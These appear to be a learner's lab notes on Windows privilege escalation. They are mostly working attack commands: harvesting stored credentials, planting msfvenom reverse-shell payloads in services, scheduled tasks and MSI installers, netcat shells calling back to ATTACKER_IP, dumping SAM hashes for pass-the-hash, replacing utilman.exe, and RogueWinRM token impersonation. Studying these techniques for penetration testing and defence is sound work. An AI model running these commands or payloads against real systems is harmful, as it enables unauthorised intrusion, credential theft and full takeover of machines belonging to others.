🪟Windows Privilege Escalation
Windows Privilege Escalation
Harvesting Passwords from Usual Spots
Unattended Windows Installations
Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:
C:\Unattend.xmlC:\Windows\Panther\Unattend.xmlC:\Windows\Panther\Unattend\Unattend.xmlC:\Windows\system32\sysprep.infC:\\Windows\system32\sysprep\sysprep.xml
As part of these files you might find credentials
Unattended Windows Installations
Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:
C:\Unattend.xmlC:\Windows\Panther\Unattend.xmlC:\Windows\Panther\Unattend\Unattend.xmlC:\Windows\system32\sysprep.infC:\\Windows\system32\sysprep\sysprep.xml
As part of these files you might find credentials
<Credentials>
<Username>Administrator</Username>
<Domain>thm.local</Domain>
<Password>MyPassword123</Password>
</Credentials>PowerShell History
If a user runs a command that includes a password it can be retrieved by using the following command"
# This will only work from cmd.exe
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtSaved Windows Credentials
Windows allows the use of other users' credentials. The command below lists saved credentials
cmdkey /list
# If you notice any credentials worth trying, use them with this command
runas /savecred /user:admin cmd.exeIIS Configuration
IIS config is stored in a file called
web.configand can store passwords for databases or authentication mechanisms.File can be found here:
C:\inetpub\wwwroot\web.configC:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Quick way to find database strings on the file:
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionStringRetrieve Credentials from PuTTY
PuTTY doesn't allow users to store their SSH password, but it will store proxy configurations that include cleartext authentication credentials
Command to retrieve stored proxy credentials
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /sScheduled Tasks
Look for scheduled tasks that either lost its binary or are using a binary you can modify
# Retrieve detailed information
schtasks /query /tn vulnask /fo list /v
# We care about the "Task to Run" and "Run As User" parameters
# Check file permissions of the Task to Run file
icacls C:\tasks\schtask.bat
# If nc64.exe available we can use that to spawn a reverse shell
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
# Start listener on attacker machine
nc -lvp 4444AlwaysInstallElevated
Windows installer files usually run with the privilege level of the user that starts it.
These can be configured to run with higher privileges from any user account, this could allow us to generate a malicious MSI file that would run with admin privileges
This method requires two registry values to be set. You can query these from the command line using the commands below
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
# You can generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_x.x.x.x LPORT=LOCAL_PORT -f msi -o malicious.msi
# You should also run the Metasploit Handler module.
# Once you have transferred the file you created, run the installer with this command and get the reverse shell
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msiAbusing Service Misconfigurations
Windows Services
Service Control Manager (SCM) is a process in charge of managing the state of services as needed
# Get service configuration
sc qc
# Service configurations are stored on the registry under
HKLM\SYSTEM\CurrentControlSet\Services\Insecure Permissions on Service Executable
If executable associated with a service has weak permissions that allows us to modify or replace it, we can gain privileges of the service's account
# Query the service configuration
sc qc WindowsScheduler
# check permissions
icacls BINARY_PATH_NAME
# Generate an exe-service payload using msfvenom and serve it through a python webserver
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
python3 -m http.server
# Pull the payload from victim machine using powershell
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
# Replace the service executable with our payload
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:FUnquoted Service Paths
Particular behavior happens when the service is configured to point to an "unquoted" executable. This means the path of the associated executable isn't properly quoted to account for spaces on the command
When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute:
This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute
C:\\MyPrograms\\Disk.exeand take the rest as arguments.Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:
First, search for
C:\\MyPrograms\\Disk.exe. If it exists, the service will run this executable.If the latter doesn't exist, it will then search for
C:\\MyPrograms\\Disk Sorter.exe. If it exists, the service will run this executable.If the latter doesn't exist, it will then search for
C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe. This option is expected to succeed and will typically be run in a default installation.
# Create payload using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe
# Move payload and grant permissions
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
# restart service
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"Insecure Service Permissions
If the service DACL lets you modify the configuration then you can reconfigure the service
This will let you point to any executable you need and run it with any account you prefer, including SYSTEM itself
# use accesschk from the sysinternal suite to check for a service DACL
accesschk64.exe -qlc SERVICE_NAME
# if the BUILTIN\\Users group has the SERVICE_ALL_ACCESS permission then any user can reconfigure the service
# Create msfvenom and move it to the victim machine using the same steps as before
# Re-configure the service
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
# Restart service
- If binaries are installed in non-default paths that is world-writable (anything other than C:\\Program Files or C:\\Program Files(x86)) then the vulnerability can be exploited.
- For example if it is installed in C:\\MyPrograms (inherits permissions of C:\\ directory which allows any user to create files and folders in it.)
- The process of creating a payload with msfvenom is the same as before Insecure Service Permissions
If the service DACL (not the service's executable DACL) lets you modify the configuration of a service, then you can reconfigure the service
This let's you point to any executable and run it with the account you prefer.
# You can check for a service DACL from the CLI using Accesschk
# Accesschk is included in the Sysinternals suite
accesschk64.exe -qlc thmservice
# If the Users groups has SERVICE_ALL_ACCESS permission, that means you can reconfigure the service
# Create msfvenom payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe
# start listener in attacker
nc -lvp 4447
# transfer payload using python and wget
# Grant permissions to Everyone to execute the payload
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
# Change the service's associated executable and account
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
# We choose to use LocalSystem account because it is the highest privileged account
# Trigger payload
sc stop THMService
sc start THMServiceAbusing Dangerous Privileges
Windows Privileges
A complete list of available privileges on Windows systems is available here.
You can find a comprehensive list of exploitable privileges on the Priv2Admin Github project.
# Check user privileges
whoami /privSeBackup / SeRestore
Allows users to read and write to any file in the system, ignoring any DACL in place
Allows certain users to perform backups from a system without needing full admin privileges
We can escalate privileges by copying the SAM and SYSTEM registry hives to extract local Admin's password hash
Technique: Copy SAM and SYSTEM registry hives to extract the local Admin's password hash
# Check privileges
whoami /priv
# Backup SAM and SYSTEM hashes
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
# Copy files to atacker machine using SMB or other available method
# For SMB, we can use smbserver.py to start a simple SMB server with a network share in a directory on the attacker machine
mkdir share
# This creates a share named public pointing to the share directory and requires the username and password of the current windows session
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
# Use the copy command in target machine to transfer files to your attack box
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public
# Use impacket to get password hashes
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
# Use Admin hash to perform a pass-the-Hash attack and gain access to target machine with SYSTEM privileges
python3.9 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP
# Check you get SYSTEM privileges
whoami SeTakeOwnership
Allows users to take ownership of any object on the system, including files and registry keys
Opens up possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take over the service's executable
# Check privileges
whoami /priv
# Abuse utilman.exe - a built-in windows app used to provide Ease of Access during the lock screen
# Utilman is run with SYSTEM privileges, we can gain SYSTEM privileges if we replace the original binary for any payload we like.
# Replace utilman, by taking ownership of it
takeown /f C:\Windows\System32\Utilman.exe
# Being owner of a file doesn't mean you have privileges over it
# Give your user full permissions over utilman.exe using this command:
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
# Replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe
# Trigger utilman by locking screen from the start button
# Click on the Ease of Access button, running utilman.exe with SYSTEM privileges.
# Since we replaced it with cmd.exe we will get a command prompt with SYSTEM privilegesSeImpersonate / SeAssignPrimaryToken
Allow a process to impersonate other users and act on their behalf
Usually consists of being able to spawn a process or thread under the security context of another user
As attackers if we can take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process
The LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges
Things we need to elevate privileges
To spawn a process so that users can connect and authenticate to it for impersonation to occur
Find a way to force privileged users to connect and authenticate to the spawned malicious process
# Use RogueWinRM exploit to accomplish both conditions
# Assume we already compromised a website running on IIS and we planted a web shell
# Use the web shell to check for assigned privileges of the compromised account and confirm we have both privileges of interest
# RogueWinRM exploit is possible because whenever a user (even unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges
# Post 5985 is simply a port that exposes a PowerShell console
# Think of it as SSH but using PowerShell
# If WinRM isn't running on victim server, an attacker can
# start a fake WinRM service on port 5985 and cath the
# authentication attempt made by the BITS service
# If the attacker has SeImpersonate privileges, you
# can execute any command on behalf of the connecting user,
# which is SYSTEM
# Trigger the RogueWinRM using the web shell
C:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools.nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"Abusing vulnerable software
Unpatched Software
Use the
wmictool to list software installed on the target system and its versions
# Command will dump information it can gather on installed software
wmic product get name,version,vendorSearch for existing exploits on installed software online
Tools of the Trade
Script developed to enumerate the target system to uncover privilege escalation paths
PowerShell script that searches common privilege escalation on the target system
To run PrivescCheck on target system, you might need to bypass the execution policy restrictions using
Set-ExecutionPolicy Bypass -Scope process -Force
Avoids making unnecessary noise that can attract attention because it runs on your attacking machine
Before using it, type
wes.py --updatecommand to update the databaseTo use the script run
systeminfocommand on the target systemDirect the output to a .txt file you will need to move to your attacking machine
# Run wes.py
wes.py systeminfo.txt Last updated